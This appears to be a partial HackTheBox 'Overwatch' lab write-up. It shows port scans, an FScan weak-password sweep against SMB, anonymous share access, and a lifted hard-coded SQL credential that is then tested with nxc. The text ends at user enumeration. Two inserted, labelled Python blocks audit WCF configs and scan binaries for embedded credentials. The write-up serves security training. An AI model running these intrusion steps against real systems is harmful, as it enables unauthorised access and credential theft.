HackTheBox-Overwatch

You are in the south's blazing sun where heavy snow falls
I am in the north's cold night where it is spring all year round
If there is still time before dark
I want to forget your eyes
A whole lifetime is not enough to finish a single dream


Target IP: 10.129.6.144

Difficulty: Medium

Topics covered:

Full-port service scanning and information gathering: use Rustscan and Nmap to quickly locate assets, and Fscan for automated vulnerability scanning and liveness confirmation.

Anonymous SMB enumeration and sensitive file disclosure: smbclient reveals the software$ share is readable anonymously, yielding the core business program and its configuration.

.NET static reverse engineering: decompile the MSIL and extract hard-coded database connection credentials.

ADIDNS (Active Directory Integrated DNS) injection: use domain user privileges to write a malicious A record to the domain controller, hijacking an internal hostname.

MSSQL linked-server leakage and credential capture: abuse the MSSQL Linked Server feature and use Responder to induce the server to authenticate, capturing a cleartext password.

Internal lateral movement and tunnelling: obtain initial access via Evil-WinRM, then use frp for reverse port forwarding to bypass the firewall and reach the internal WCF service.

WCF (Windows Communication Foundation) exploitation: command injection against PowerShell pipeline concatenation logic in the .NET service.

Privilege escalation: the injected code runs as SYSTEM, taking us from an ordinary domain user to the highest system privilege.


Port scanning

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./rustscan -a 10.129.6.144 -- -sV -sC -T4 -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
You miss 100% of the ports you don't scan. - RustScan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.6.144:53
Open 10.129.6.144:88
Open 10.129.6.144:135
Open 10.129.6.144:139
Open 10.129.6.144:445
Open 10.129.6.144:464
Open 10.129.6.144:3268
Open 10.129.6.144:3269
Open 10.129.6.144:3389
Open 10.129.6.144:5985
Open 10.129.6.144:6520
Open 10.129.6.144:9389

Open 10.129.6.144:49664
Open 10.129.6.144:49669
Open 10.129.6.144:57989
Open 10.129.6.144:62662
Open 10.129.6.144:62663
Open 10.129.6.144:65158
Open 10.129.6.144:65177
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV -sC -T4 -A" on ip 10.129.6.144
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-03 01:35 -0500
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:35
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE: Active NSE Script Threads: 1 (0 waiting)
NSE Timing: About 0.00% done
Completed NSE at 01:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
Initiating Ping Scan at 01:35
Scanning 10.129.6.144 [4 ports]
Completed Ping Scan at 01:35, 0.11s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 01:35
Scanning overwatch.htb (10.129.6.144) [19 ports]
Discovered open port 139/tcp on 10.129.6.144
Discovered open port 445/tcp on 10.129.6.144
Discovered open port 464/tcp on 10.129.6.144
Discovered open port 3389/tcp on 10.129.6.144
Discovered open port 135/tcp on 10.129.6.144
Discovered open port 53/tcp on 10.129.6.144
Discovered open port 65177/tcp on 10.129.6.144
Discovered open port 88/tcp on 10.129.6.144
Discovered open port 5985/tcp on 10.129.6.144
Discovered open port 3269/tcp on 10.129.6.144
Discovered open port 49664/tcp on 10.129.6.144
Discovered open port 62662/tcp on 10.129.6.144
Discovered open port 3268/tcp on 10.129.6.144
Discovered open port 49669/tcp on 10.129.6.144
Discovered open port 65158/tcp on 10.129.6.144
Discovered open port 9389/tcp on 10.129.6.144
Discovered open port 6520/tcp on 10.129.6.144
Discovered open port 62663/tcp on 10.129.6.144
Completed SYN Stealth Scan at 01:35, 1.51s elapsed (19 total ports)
Initiating Service scan at 01:35
Scanning 18 services on overwatch.htb (10.129.6.144)
Completed Service scan at 01:36, 55.73s elapsed (18 services on 1 host)
Initiating OS detection (try #1) against overwatch.htb (10.129.6.144)
Retrying OS detection (try #2) against overwatch.htb (10.129.6.144)
Initiating Traceroute at 01:36
Completed Traceroute at 01:36, 0.15s elapsed
Initiating Parallel DNS resolution of 1 host. at 01:36
Completed Parallel DNS resolution of 1 host. at 01:36, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
NSE: Script scanning 10.129.6.144.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:36
NSE Timing: About 99.96% done; ETC: 01:37 (0:00:00 remaining)
Completed NSE at 01:37, 40.08s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:37
Completed NSE at 01:37, 3.51s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:37
Completed NSE at 01:37, 0.00s elapsed
Nmap scan report for overwatch.htb (10.129.6.144)
Host is up, received echo-reply ttl 127 (0.13s latency).
Scanned at 2026-03-03 01:35:45 EST for 106s

PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 (generic dns response: SERVFAIL)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-03-03 06:35:53Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2026-03-03T06:37:28+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Issuer: commonName=S200401.overwatch.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-12-07T15:16:06
| Not valid after: 2026-06-08T15:16:06
| MD5: 0da8 f9a5 d788 e363 07b1 5f70 6524 ffcb
| SHA-1: 3287 c62d 4408 7fbb 4038 00b3 32fa da67 fb22 14bc
| SHA-256: b8ca 73a4 d338 1c57 3558 eec9 d8d1 9381 5b2d e30e 7945 ff69 0565 8935 84da f28a
| rdp-ntlm-info:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
| Product_Version: 10.0.20348
|_ System_Time: 2026-03-03T06:36:49+00:00
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6520/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ssl-date: 2026-03-03T06:37:28+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-03-03T05:48:24
| Not valid after: 2056-03-03T05:48:24
| MD5: 9fd7 9ca6 befd 1a66 036e 81aa f910 4e27
| SHA-1: ba8c 37eb 8b91 22a9 7756 9052 9399 5618 a3f3 f366
| SHA-256: 5e1e 4cee b679 3777 50e6 54eb a9ae c118 3382 f647 ffe6 5e0e 0952 06a3 47a6 9820
| ms-sql-info:
| 10.129.6.144:6520:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 6520
| ms-sql-ntlm-info:
| 10.129.6.144:6520:
| Target_Name: OVERWATCH
| NetBIOS_Domain_Name: OVERWATCH
| NetBIOS_Computer_Name: S200401
| DNS_Domain_Name: overwatch.htb
| DNS_Computer_Name: S200401.overwatch.htb
| DNS_Tree_Name: overwatch.htb
|_ Product_Version: 10.0.20348
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57989/tcp filtered unknown no-response
62662/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
62663/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
65158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
65177/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=3/3%Time=69A68152%P=x86_64-pc-linux-gnu%r(DNSSt
SF:atusRequestTCP,E,"\0\x0c\0\0\x90\x02\0\0\0\0\0\0\0\0");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.98%E=4%D=3/3%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=69A681AB%P=x86_64-pc-linux-gnu)
SEQ(SP=FC%GCD=1%ISR=10B%TI=I%II=I%SS=S%TS=A)
SEQ(SP=FE%GCD=1%ISR=109%TI=I%II=I%SS=S%TS=A)
OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=M552NW8ST11%O6=M552ST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Uptime guess: 0.036 days (since Tue Mar 3 00:46:00 2026)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 16863/tcp): CLEAN (Timeout)
| Check 2 (port 21555/tcp): CLEAN (Timeout)
| Check 3 (port 42274/udp): CLEAN (Timeout)
| Check 4 (port 16832/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-time:
| date: 2026-03-03T06:36:53
|_ start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 145.90 ms 10.10.14.1
2 146.18 ms overwatch.htb (10.129.6.144)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:37
Completed NSE at 01:37, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:37
Completed NSE at 01:37, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:37
Completed NSE at 01:37, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.59 seconds
Raw packets sent: 112 (8.660KB) | Rcvd: 56 (3.240KB)



┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./FScan_2.0.1_linux_x32 -h 10.129.6.144
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1

[1.2s] 已选择服务扫描模式
[1.2s] 开始信息扫描
[1.2s] 最终有效主机数量: 1
[1.2s] 开始主机扫描
[1.2s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.2s] 有效端口数量: 233
[1.3s] [*] 端口开放 10.129.6.144:88
[1.3s] [*] 端口开放 10.129.6.144:135
[1.3s] [*] 端口开放 10.129.6.144:389
[1.3s] [*] 端口开放 10.129.6.144:139
[1.3s] [*] 端口开放 10.129.6.144:445
[4.2s] 扫描完成, 发现 5 个开放端口
[4.2s] 存活端口数量: 5
[4.2s] 开始漏洞扫描
[4.3s] POC加载完成: 总共387个,成功387个,失败0个
[4.5s] [*] NetInfo 扫描结果
目标主机: 10.129.6.144
主机名: S200401
发现的网络接口:
IPv4地址:
└─ 10.129.6.144
IPv6地址:
└─ dead:beef::fd3d:fdfe:9cc6:99c0
[7.2s] [+] SMB认证成功 10.129.6.144:445 admin:123456
[7.9s] SMB2共享信息 10.129.6.144:445 admin Pass:123456 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[7.9s] SMB2共享信息 10.129.6.144:445 admin Pass:admin 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[7.9s] SMB2共享信息 10.129.6.144:445 admin Pass:admin123 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.0s] SMB2共享信息 10.129.6.144:445 admin Pass:root 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.0s] SMB2共享信息 10.129.6.144:445 admin Pass: 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.1s] SMB2共享信息 10.129.6.144:445 admin Pass:pass123 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.2s] SMB2共享信息 10.129.6.144:445 admin Pass:pass@123 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.2s] SMB2共享信息 10.129.6.144:445 admin Pass:password 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.3s] SMB2共享信息 10.129.6.144:445 admin Pass:P@ssword123 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[8.3s] SMB2共享信息 10.129.6.144:445 admin Pass:Password 共享:[ADMIN$ C$ IPC$ NETLOGON software$ SYSVOL]
[1m24s] 扫描已完成: 9/9

SMB service probing

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -L //10.129.6.144
Password for [WORKGROUP\root]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
software$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.6.144 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

There is a share named software$; try reading it.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# smbclient -N //10.129.6.144/software$
Try "help" to get a list of possible commands.
smb: \> dir
. DH 0 Fri May 16 21:27:07 2025
.. DHS 0 Thu Jan 1 01:46:47 2026
Monitoring DH 0 Fri May 16 21:32:43 2025

7147007 blocks of size 4096. 1135048 blocks available
smb: \> cd Monitoring\
smb: \Monitoring\> dir
. DH 0 Fri May 16 21:32:43 2025
.. DH 0 Fri May 16 21:27:07 2025
EntityFramework.dll AH 4991352 Thu Apr 16 16:38:42 2020
EntityFramework.SqlServer.dll AH 591752 Thu Apr 16 16:38:56 2020
EntityFramework.SqlServer.xml AH 163193 Thu Apr 16 16:38:56 2020
EntityFramework.xml AH 3738289 Thu Apr 16 16:38:40 2020
Microsoft.Management.Infrastructure.dll AH 36864 Mon Jul 17 10:46:10 2017
overwatch.exe AH 9728 Fri May 16 21:19:24 2025
overwatch.exe.config AH 2163 Fri May 16 21:02:30 2025
overwatch.pdb AH 30208 Fri May 16 21:19:24 2025
System.Data.SQLite.dll AH 450232 Sun Sep 29 16:41:18 2024
System.Data.SQLite.EF6.dll AH 206520 Sun Sep 29 16:40:06 2024
System.Data.SQLite.Linq.dll AH 206520 Sun Sep 29 16:40:42 2024
System.Data.SQLite.xml AH 1245480 Sat Sep 28 14:48:00 2024
System.Management.Automation.dll AH 360448 Mon Jul 17 10:46:10 2017
System.Management.Automation.xml AH 7145771 Mon Jul 17 10:46:10 2017
x64 DH 0 Fri May 16 21:32:33 2025
x86 DH 0 Fri May 16 21:32:33 2025

7147007 blocks of size 4096. 1135398 blocks available
smb: \Monitoring\>

Quite a lot of files in there.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat overwatch.exe.config
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<configSections>
<!-- For more information on Entity Framework configuration, visit http://go.microsoft.com/fwlink/?LinkID=237468 -->
<section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false" />
</configSections>
<system.serviceModel>
<services>
<service name="MonitoringService">
<host>
<baseAddresses>
<add baseAddress="http://overwatch.htb:8000/MonitorService" />
</baseAddresses>
</host>
<endpoint address="" binding="basicHttpBinding" contract="IMonitoringService" />
<endpoint address="mex" binding="mexHttpBinding" contract="IMetadataExchange" />
</service>
</services>
<behaviors>
<serviceBehaviors>
<behavior>
<serviceMetadata httpGetEnabled="True" />
<serviceDebug includeExceptionDetailInFaults="True" />
</behavior>
</serviceBehaviors>
</behaviors>
</system.serviceModel>
<entityFramework>
<providers>
<provider invariantName="System.Data.SqlClient" type="System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer" />
<provider invariantName="System.Data.SQLite.EF6" type="System.Data.SQLite.EF6.SQLiteProviderServices, System.Data.SQLite.EF6" />
</providers>
</entityFramework>
<system.data>
<DbProviderFactories>
<remove invariant="System.Data.SQLite.EF6" />
<add name="SQLite Data Provider (Entity Framework 6)" invariant="System.Data.SQLite.EF6" description=".NET Framework Data Provider for SQLite (Entity Framework 6)" type="System.Data.SQLite.EF6.SQLiteProviderFactory, System.Data.SQLite.EF6" />
<remove invariant="System.Data.SQLite" /><add name="SQLite Data Provider" invariant="System.Data.SQLite" description=".NET Framework Data Provider for SQLite" type="System.Data.SQLite.SQLiteFactory, System.Data.SQLite" /></DbProviderFactories>
</system.data>
</configuration>

The database layer uses SQLite, and the service appears to listen on port 8000 on the internal network (http://overwatch.htb:8000/MonitorService), a WCF service endpoint.
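An added example, not from the original write-up: a small auditor for the overwatch.exe.config excerpt above, written in Python against the standard-library XML parser. It lists the WCF base addresses and endpoints and flags the settings a reviewer would object to (metadata published over plain HTTP, basicHttpBinding with no transport security by default, includeExceptionDetailInFaults returning stack traces to clients), then runs the same check against a hardened variant that I constructed for comparison.

```python
"""Audit a WCF service configuration for settings that leak information.

Added example, not from the original write-up. CONFIG_XML is the relevant
part of the overwatch.exe.config shown above; HARDENED_XML is a corrected
variant constructed here for comparison.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

CONFIG_XML = """<configuration>
  <system.serviceModel>
    <services>
      <service name="MonitoringService">
        <host><baseAddresses>
          <add baseAddress="http://overwatch.htb:8000/MonitorService" />
        </baseAddresses></host>
        <endpoint address="" binding="basicHttpBinding" contract="IMonitoringService" />
        <endpoint address="mex" binding="mexHttpBinding" contract="IMetadataExchange" />
      </service>
    </services>
    <behaviors><serviceBehaviors><behavior>
      <serviceMetadata httpGetEnabled="True" />
      <serviceDebug includeExceptionDetailInFaults="True" />
    </behavior></serviceBehaviors></behaviors>
  </system.serviceModel>
</configuration>"""

# Constructed hardened counterpart: HTTPS base address, a binding whose default
# security mode is not None, no public metadata, no exception details in faults.
HARDENED_XML = """<configuration>
  <system.serviceModel>
    <services>
      <service name="MonitoringService">
        <host><baseAddresses>
          <add baseAddress="https://overwatch.htb:8443/MonitorService" />
        </baseAddresses></host>
        <endpoint address="" binding="wsHttpBinding" contract="IMonitoringService" />
      </service>
    </services>
    <behaviors><serviceBehaviors><behavior>
      <serviceMetadata httpGetEnabled="False" />
      <serviceDebug includeExceptionDetailInFaults="False" />
    </behavior></serviceBehaviors></behaviors>
  </system.serviceModel>
</configuration>"""


def _is_true(value) -> bool:
    """WCF config booleans are written as True/False in any letter case."""
    return (value or "").strip().lower() == "true"


def audit_wcf_config(xml_text: str) -> Dict[str, object]:
    """Return the services found and a list of human-readable findings."""
    root = ET.fromstring(xml_text)
    services: List[Dict[str, object]] = []
    findings: List[str] = []

    for svc in root.iter("service"):
        name = svc.get("name", "?")
        # <add baseAddress="..."/> entries live under <host><baseAddresses>.
        bases = [a.get("baseAddress") for a in svc.iter("add") if a.get("baseAddress")]
        endpoints = [(e.get("address", ""), e.get("binding"), e.get("contract"))
                     for e in svc.findall("endpoint")]
        services.append({"name": name, "baseAddresses": bases, "endpoints": endpoints})

        for base in bases:
            if base.lower().startswith("http://"):
                findings.append(f"{name}: base address {base} is plain HTTP")
        for address, binding, contract in endpoints:
            if binding == "basicHttpBinding":
                findings.append(f"{name}: endpoint '{address}' ({contract}) uses basicHttpBinding, whose default security mode is None")
            if binding == "mexHttpBinding":
                findings.append(f"{name}: endpoint '{address}' publishes the service contract (MEX) over HTTP")

    for behavior in root.iter("behavior"):
        metadata = behavior.find("serviceMetadata")
        if metadata is not None and _is_true(metadata.get("httpGetEnabled")):
            findings.append("serviceMetadata httpGetEnabled=True: WSDL is served to anyone who can reach the base address")
        debug = behavior.find("serviceDebug")
        if debug is not None and _is_true(debug.get("includeExceptionDetailInFaults")):
            findings.append("serviceDebug includeExceptionDetailInFaults=True: exception messages and stack traces are returned to clients")

    return {"services": services, "findings": findings}


if __name__ == "__main__":
    for label, xml_text in (("original", CONFIG_XML), ("hardened", HARDENED_XML)):
        report = audit_wcf_config(xml_text)
        print(f"[{label}] {len(report['findings'])} finding(s)")
        for line in report["findings"]:
            print("  -", line)
```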

LDAP probing

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc ldap 10.129.6.144 -u "" -p ""
LDAP 10.129.6.144 389 S200401 [*] Windows Server 2022 Build 20348 (name:S200401) (domain:overwatch.htb) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.6.144 389 S200401 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090D0D, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP 10.129.6.144 389 S200401 [+] overwatch.htb\:

Download overwatch.exe for reverse engineering

smb: \Monitoring\> get overwatch.exe
getting file \Monitoring\overwatch.exe of size 9728 as overwatch.exe (19.9 KiloBytes/sec) (average 453.1 KiloBytes/sec)
smb: \Monitoring\>

Open it in IDA for analysis: in Program__CheckEdgeHistory the string variable aServerLocalhos holds hard-coded database connection credentials.

loc_35B:
call string [mscorlib]System.IO.Path::GetTempFileName()
stloc.1
ldloc.0
ldloc.1
ldc.i4.1
call void [mscorlib]System.IO.File::Copy(string, string, bool)
.try {
ldstr aServerLocalhos // "Server=localhost;Database=SecurityLogs;"...
newobj instance void [System.Data]System.Data.SqlClient.SqlConnection::.ctor(string)
stloc.2
.try {
ldloc.2
callvirt instance void [System.Data]System.Data.Common.DbConnection::Open()
newobj instance void [System.Data]System.Data.SqlClient.SqlCommand::.ctor()
stloc.3
.try {
ldloc.3
ldloc.2
callvirt instance void [System.Data]System.Data.SqlClient.SqlCommand::set_Connection(class [System.Data]System.Data.SqlClient.SqlConnection)
ldstr aDataSource // "Data Source="
ldloc.1
ldstr aVersion3 // ";Version=3;"
call string [mscorlib]System.String::Concat(string, string, string)
newobj instance void [System.Data.SQLite]System.Data.SQLite.SQLiteConnection::.ctor(string)
stloc.s 4
ldloc.s 4
callvirt instance void [System.Data]System.Data.Common.DbConnection::Open()
ldstr aSelectUrlLastV // "SELECT url, last_visit_time FROM urls O"...
ldloc.s 4
newobj instance void [System.Data.SQLite]System.Data.SQLite.SQLiteCommand::.ctor(string, class [System.Data.SQLite]System.Data.SQLite.SQLiteConnection)
callvirt instance class [System.Data.SQLite]System.Data.SQLite.SQLiteDataReader [System.Data.SQLite]System.Data.SQLite.SQLiteCommand::ExecuteReader()
stloc.s 5
br.s loc_3EF
"Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=TI0LKcfHzZw1Vv;"
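As an added example (not from the original write-up), a defender-side scanner for the same class of finding: it pulls ASCII and UTF-16LE strings out of a binary, since .NET stores string literals such as aServerLocalhos in the CLR #US heap as UTF-16LE, parses anything shaped like an ADO.NET connection string, and reports entries that carry credentials with the secret redacted. The sample bytes are constructed to mimic the literals in overwatch.exe; the password value in them is a placeholder.

```python
"""Scan a binary for hard-coded ADO.NET connection strings.

Added example, not part of the original write-up. .NET keeps string literals
(such as aServerLocalhos in overwatch.exe) in the CLR #US heap as UTF-16LE,
so an ASCII-only `strings` pass walks straight past them; both encodings are
scanned here.
"""
import re
from typing import Dict, List

# Keys that identify the server and keys that carry secrets (keys are
# lower-cased before comparison).
SERVER_KEYS = {"server", "data source"}
SECRET_KEYS = {"password", "pwd", "user id", "uid"}

ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")            # plain text
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")    # managed literals


def extract_strings(blob: bytes) -> List[str]:
    """Return printable runs in both encodings, decoded to str."""
    out = [m.group().decode("ascii") for m in ASCII_RUN.finditer(blob)]
    out += [m.group().decode("utf-16le") for m in UTF16_RUN.finditer(blob)]
    return out


def parse_connection_string(text: str) -> Dict[str, str]:
    """Split 'Key=Value;Key=Value;' into a dict with lower-cased keys."""
    parts: Dict[str, str] = {}
    for item in text.split(";"):
        if "=" in item:
            key, value = item.split("=", 1)
            parts[key.strip().lower()] = value.strip()
    return parts


def find_hardcoded_credentials(blob: bytes) -> List[Dict[str, str]]:
    """Return every parsed connection string that embeds a credential.

    A string counts as a connection string only if it names a server and has
    at least two key=value pairs. Literals that are concatenated at runtime
    (the page's "Data Source=" + path + ";Version=3;") therefore do not match
    on their own; that is a known blind spot of static string scanning.
    """
    hits = []
    for s in extract_strings(blob):
        parts = parse_connection_string(s)
        if len(parts) >= 2 and parts.keys() & SERVER_KEYS and parts.keys() & SECRET_KEYS:
            hits.append(parts)
    return hits


def redact(parts: Dict[str, str]) -> Dict[str, str]:
    """Copy of a parsed connection string with password values masked."""
    return {k: ("********" if k in {"password", "pwd"} else v) for k, v in parts.items()}


# Constructed sample mimicking overwatch.exe's literals: a UTF-16LE connection
# string (placeholder password), the two SQLite fragments, and an ASCII query.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 16
    + "Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=s3cret-example;".encode("utf-16le")
    + b"\x00\x00"
    + "Data Source=".encode("utf-16le") + b"\x00\x00"
    + ";Version=3;".encode("utf-16le") + b"\x00\x00"
    + b"SELECT url, last_visit_time FROM urls ORDER BY last_visit_time DESC\x00"
)


if __name__ == "__main__":
    for hit in find_hardcoded_credentials(SAMPLE_BLOB):
        print("hard-coded credential:", redact(hit))
```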

Credentials obtained

sqlsvc:TI0LKcfHzZw1Vv

Test whether the credentials work using nxc

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.6.144 -u "sqlsvc" -p "TI0LKcfHzZw1Vv" --shares
SMB 10.129.6.144 445 S200401 [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.6.144 445 S200401 [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
SMB 10.129.6.144 445 S200401 [*] Enumerated shares
SMB 10.129.6.144 445 S200401 Share Permissions Remark
SMB 10.129.6.144 445 S200401 ----- ----------- ------
SMB 10.129.6.144 445 S200401 ADMIN$ Remote Admin
SMB 10.129.6.144 445 S200401 C$ Default share
SMB 10.129.6.144 445 S200401 IPC$ READ Remote IPC
SMB 10.129.6.144 445 S200401 NETLOGON READ Logon server share
SMB 10.129.6.144 445 S200401 software$ READ
SMB 10.129.6.144 445 S200401 SYSVOL READ Logon server share

Confirmed valid; enumerate users first

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.6.144 -u "sqlsvc" -p "TI0LKcfHzZw1Vv" --users
